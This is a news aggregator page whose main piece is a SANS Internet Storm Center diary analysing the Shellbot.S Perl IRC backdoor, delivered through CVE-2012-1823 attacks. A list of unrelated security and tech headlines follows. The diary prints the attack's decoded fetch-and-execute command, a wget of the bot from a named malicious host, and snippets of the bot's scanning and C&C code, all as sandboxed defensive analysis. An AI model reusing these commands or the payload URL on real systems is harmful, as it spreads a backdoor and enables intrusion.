Hackin9

InfoSec News

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Software giant says it will release the fix soon even though it has seen few attempts to exploit the flaw.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
 

In the oldie but goodie category, reader Jon Turner sent us a fun example of old school malfeasance this morning that I'll share for your review and tactical opportunities.
I let him speak for himself:
We've been getting pretty regularly pinged with attempts to exploit CVE-2012-1823. We're not vulnerable for a few different reasons, so I'd been ignoring it but I finally got around to pulling down a packet capture of the traffic and inspecting it. The attack attempts to disable a few security-related PHP configuration settings, disable Suhosin, and then pull down and execute a Perl script via a system call.
Though I think our attacker is a bot or script kiddie (they didn't bother to fingerprint the server and pass an attack for the right OS), the script is pretty interesting. Forefront detects it as Backdoor:Perl/Shellbot.S. There are sections of the code for joining an IRC channel for CC, performing port scans, and automatically exploiting other systems. It looks like more than one developer was involved in writing the exploit code.

Let's have a little fun and dig in to Shellbot.S a bit.

As also described by Jon, the evil bits are still available at the URL in the base64_encoded instructions in the packets:
data=' ?'

If you're following along at home, use a sandboxed/isolated Linux VM that you can reset when all finished.
Via your favorite base64 encoder/decoder (I like the HackBar Firefox add-on) decode the string above and you should end up with:
echo st4r7.system( perl php.jpg).7h33nd

From my Ubuntu VM I conducted the following:

[email protected]tu:~$ netstat -ano | grep ESTABLISHED
No results.

Went and wgot the bot code.
[email protected]:~$ wget http://ckboot.altervista.org/php.jpg
--2012-07-11 13:47:41--http://ckboot.altervista.org/php.jpg
Resolving ckboot.altervista.org... 178.63.21.200
Connecting to ckboot.altervista.org|178.63.21.200|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15728 (15K) [image/jpeg]
Saving to: `php.jpg'
100%[=========================================================================================] 15,728 27.1K/s in 0.6s
2012-07-11 13:47:51 (27.1 KB/s) - `php.jpg' saved [15728/15728]

Followed orders per the base64 instructions:
[email protected]:~$ perl php.jpg

Now we have some results, instant IRC hookup.
[email protected]:~$ netstat -ano | grep ESTABLISHED
tcp 0 0 192.168.45.132:33371 83.66.116.112:6667 ESTABLISHED off (0.00/0/0)

My Ubuntu VM was not running an SSH daemon, I didn't even have it installed.
But line 14 of the spreader
Yep, confirmed:
[email protected]:~$ ps aux | grep sshd
malman 17940 96.30.2 69442592 pts/3 R 13:49 2:23 /usr/sbin/sshd

As Jon stated, in the code we see that the script:
1) Joins an IRC channel for CC
my @hostauth=(localhost
my @canais=(#consola

2) Performs port scans
@portas=(21,22,23,25,80,113,135,445,1025,5000,6660,6661,6662,6663,
6665,6666,6667,6668,6669,7000,8080,8018

sendraw($IRC_cur_socket, PRIVMSG $printl :\002[SCAN]\002 Scanning .$1. for open ports.

3) Automatically exploits unpatched PHP opportunities and leverages Google for some heavy lifting.
Starting at line 209:
if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
sendraw($IRC_cur_socket, PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched INDEXU for .$1. seconds.

Starting at line 491:
my $query=www.google.com/search?q=

$query.=num=$nstart=$s


while ($page =~m/a class=l href=\?http:\/\/([^\]+)\?/g){

A $funcarg params check also reveals that Shellbot.S included TCP, UDP, and HTTP flooding functionality.

There are references to this source code being reported to Securityfocus as seen in attacks as far back as 2006.
But my favorite reference in this classic-come-lately?
# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.

Script kiddie indeed.
Keep those PHP apps and instances patched, folks.

Russ McRee | @holisticinfosec











(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Enterprises that use Internet services in Asia for branch office connectivity continue to report latency issues. We outline what enterprises must do to minimize Internet latency and optimize application performance.
 
The first batch of iPhone 5 handsets began shipping on Tuesday to people who ordered them online last week, according to FedEx tracking notices delivered the same day.
 
Like an aircraft black box, the new ioSafe N2 is built for vulnerable data that is stored and shared on a network.
 
Answering critics who said Google+ was among the walking dead, Google this week announced that it has some 100 million active users among the 400 million that have signed up for the social network that turned a year-old in June.
 
The National Institute of Standards and Technology (NIST) has released a final version of its risk assessment guidelines that can provide senior leaders and executives with the information they need to understand and make decisions about ...
 
The National Institute of Standards and Technology (NIST) will host a workshop at its Gaithersburg, Md., headquarters October 15 and16, 2012, to discuss ways NIST can focus its work to help federal departments and agencies manage the ...
 
Twitter is getting a new look and it's looking a lot like Facebook.
 
Researchers from security vendor Damballa have identified malicious Internet traffic that they believe is generated by a new and elusive variant of the sophisticated TDL4 malware.
 
SonicWall AntiSpam & EMail Multiple HTML Injection and Cross Site Scripting Vulnerabilities
 

Data privacy issues present new data governance challenges
TechTarget
PHILADELPHIA – Many organizations lump information security and data privacy together, meaning infosec teams end up managing privacy issues by default. That's not necessarily a bad thing, according to one data privacy expert, but privacy comes with ...

and more »
 
Twitter announced several new features today, including new mobile versions and an updated profile page that features a header photo. Here's how you can upload one.
 
The online accounts of Virgin Mobile USA subscribers are vulnerable to brute force attacks because the company forces customers to use weak passwords on its website, according to a software developer.
 
RETIRED: Auxilium PetRatePro Multiple Input Validation Vulnerabilities
 
Asterisk CVE-2012-4737 Access Rule Remote Security Bypass Vulnerability
 

The cloud: transforming the role of the infosec professional
Infosecurity Magazine
Tools like the CSA's Cloud Controls Matrix, Howie continued, can be used by infosec professionals to judge their requirements against any provider it may be considering. “It's a way of improving transparency on how the services are run, operated and ...

 
Intel hopes security features from McAfee will help the company differentiate its mobile chips from its rivals', according to Intel's software chief Renee James.
 
Germany's cybersecurity agency is urging users to drop Internet Explorer and switch to a rival, like Chrome or Firefox, until Microsoft patches a new critical bug in its browser.
 
LG said its Optimus G smartphone with a fast quad-core processor and LTE service will go on sale in the U.S. in November.
 
Box has added nine data center locations around the globe, including three in the U.S., to provide a new Accelerator service that offers up to 10 times the throughput of its previous cloud storage offering.
 
Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability
 
NGS00265 Patch Notification: Symantec Messaging Gateway - Unauthenticated detailed version disclosure
 
NGS00263 Patch Notification: Symantec Messaging Gateway - Easy CSRF to add a backdoor-administrator
 
Apple's iPhone 5 smartphone will feature a larger screen, 4G LTE network and iOS update. Is the iPhone 5 likely to shake up the smartphone market?
 
Google has put Windows XP users in a tight spot by dropping support for Internet Explorer 8 (IE8), analysts said today.
 
The U.S. Court of Appeals for the Second Circuit has granted a stay in a 7-year-old copyright lawsuit filed by the Authors Guild over the Google Books scanning project.
 
The U.S. International Trade Commission voted to move forward with an investigation of alleged infringement of Motorola Mobility patents by Apple.
 
NGS00268 Patch Notification: Symantec Messaging Gateway Out-of-band stored XSS - delivered by email
 
NGS00267 Patch Notification: Symantec Messaging Gateway SSH with backdoor user account
 
APPLE-SA-2012-09-17-1 Apple Remote Desktop 3.5.3
 
Fortigate UTM WAF Appliance - Cross Site Vulnerabilities
 
A recent study by four UCLA computer science researchers documents what some wireless data customers have long suspected -- they can get charged for wireless data access they never received.
 
Three advocacy groups plan to file a formal complaint against AT&T, alleging the carrier is violating the U.S. Federal Communications Commission's net neutrality rules for blocking a video-conferencing application on Apple's iPhones and iPads.
 
Axis VoIP Manager v2.1.5.7 - Multiple Web Vulnerabilities
 
In a thorough investigation of the Flame trojan, researchers have discovered that Flame was only one of four different malware programs written by the same authors. One of the other trojans is currently in the wild and a fifth was apparently planned


 
RETIRED: NCMedia Sound Editor Pro 'MRUList201202.dat' File Local Stack Buffer Overflow Vulnerability
 
[security bulletin] HPSBMU02813 SSRT100712 rev.1 - HP Operations Orchestration, Remote Execution of Arbitrary Code
 
Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities
 
SonicWALL EMail Security 7.3.5 - Multiple Vulnerabilities
 
I have no doubt that the iPhone 5 is a great phone and will set sales records. It's just uninteresting. So uninteresting, in fact, that it's interesting.
 
Pakistan and Bangladesh have ordered a block on YouTube in their countries, in protest against Google's reluctance to block a controversial movie trailer that mocks the Prophet Muhammad on the video-sharing site.
 
Tyler and Cameron Winklevoss, best known for their epic legal battle with Mark Zuckerberg over ownership rights to Facebook, have reportedly invested $1 million in a new social network aimed at the financial community, called SumZero.
 
The 3.5.3 update to Apple's Remote Desktop application addresses a security problem when connecting to third-party VNC servers that could lead to information disclosure; the same problem was fixed in the 3.6.x branch last month


 
Samsung Electronics has started mass production of a new type of memory chip for mobile devices, LPDDR3, that will dramatically increase performance in future smartphones and tablets, it said Tuesday.
 
According to Coverity's Software Security Risk Report, few web companies carry out testing during development, with many declining to check for bugs prior to integration testing


 
Microsoft on Monday issued a security advisory that confirmed in-the-wild attacks are exploiting an unpatched bug in Internet Explorer. The software maker is working on a fix.
 
Google-owned Motorola Mobility launched its first smartphone with an Atom processor from Intel, the companies announced at an event in London on Tuesday.
 
Lenovo said it plans to acquire Stoneware, a small U.S.-based company specializing in cloud products for schools and governments, as part of the PC maker's strategy to bolster its cloud computing offerings.
 
Apple retained the top spot in a survey released Tuesday by the American Consumer Satisfaction Index, which also found that the tablet market is spurring PC makers to improve the quality of their products.
 
The extent of the critical vulnerability in Internet Explorer is greater than previously realised. Both Microsoft and Germany's BSI have now issued warnings, though their suggested solutions differ


 
Apple Remote Desktop CVE-2012-0681 Information Disclosure Vulnerability
 

Posted by InfoSec News on Sep 17

http://www.wired.com/threatlevel/2012/09/virgin-mobile/

By Ryan Singel
Threat Level
Wired.com
09.17.12

Virgin Mobile U.S. promises its customers that it uses “standard
industry practices” to protect its customers’ personal data -- but
according to a Silicon Valley web developer, any first-year coder can
bust into a subscriber’s account, see who they call and text, register a
different phone on the account and even purchase a new...
 

Posted by InfoSec News on Sep 17

http://www.clinical-innovation.com/index.php?option=com_articles&view=article&id=35162

By Beth Walsh
Clinical-Innovation.com
September 16, 2012

The Utah Health Exchange, a state insurance exchange whose development
started several years before the healthcare reform law mandated
exchanges, was recently hacked, with words garbled, headlines blurred
and some pages inaccessible.

The Salt Lake Tribune reported on the hacking and said the...
 

Posted by InfoSec News on Sep 17

http://arstechnica.com/security/2012/09/romanians-cop-to-10-million-hacking-spree/

By Dan Goodin
Ars Technica
Sept 17, 2012

Two Romanian men have admitted to participating in an international
conspiracy that hacked into credit-card payment terminals at more than
150 Subway restaurant franchises and stole data for more than 146,000
accounts. The heist, which spanned the years 2009 to 2011, racked up
more than $10 million in losses, federal...
 

Posted by InfoSec News on Sep 17

http://www.darkreading.com/advanced-threats/167901091/security/attacks-breaches/240007486/cyber-spying-flame-attackers-operated-on-8216-need-to-know-8217-basis.html

By Kelly Jackson Higgins
Dark Reading
Sept 17, 2012

New research published separately today by Kaspersky Lab and Symantec
and in conjunction with CERT-Bund/BSI, and the International
Telecommunications Union-IMPACT, shows that the sophisticated Flame
cyberespionage campaign dates...
 

Posted by InfoSec News on Sep 17

http://tech2.in.com/news/general/ankit-fadias-website-hacked-again/440652

[This most recent attack is the ninth defacement for the Defcon 2012
Security Charlatan Award winner and fifth this year for Ankit Fadia
http://securityerrata.org/errata/charlatan/ankit_fadia/ - WK]

By tech2 News Staff
17 Sep, 2012

Ankit Fadia is known as one of India’s first 'ethical hackers'. He has been
recognised by a number of software companies, and...
 
Internet Storm Center Infocon Status